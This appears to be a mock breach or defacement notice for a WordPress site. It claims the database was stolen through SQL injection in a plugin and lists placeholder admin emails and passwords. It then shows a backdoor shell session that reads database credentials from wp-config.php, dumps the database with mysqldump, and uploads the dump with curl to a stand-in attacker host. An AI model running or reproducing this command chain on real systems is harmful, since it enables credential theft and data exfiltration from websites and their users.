DATABASE FULLY COMPROMISED
Your WordPress database has been exfiltrated. All user data, passwords, and site content stolen.
LEAKED ADMINS:
admin@site.com : P@ssw0rd123!
editor@site.com : Wordpress2024!
847 users total dumped â attacker-server.com/leak.sql
Server accessed via SQL injection in vulnerable plugin.
# Backdoor shell established
$ whoami
www-data
$ cat wp-config.php | grep DB_
DB_NAME: yoursite_wp
DB_USER: wp_user
DB_PASS: r3alp@ssw0rd
$ mysqldump -u wp_user -pr3alp@ssw0rd yoursite_wp > /tmp/full_dump.sql
$ curl -F "dump=@/tmp/full_dump.sql" http://attacker.com/upload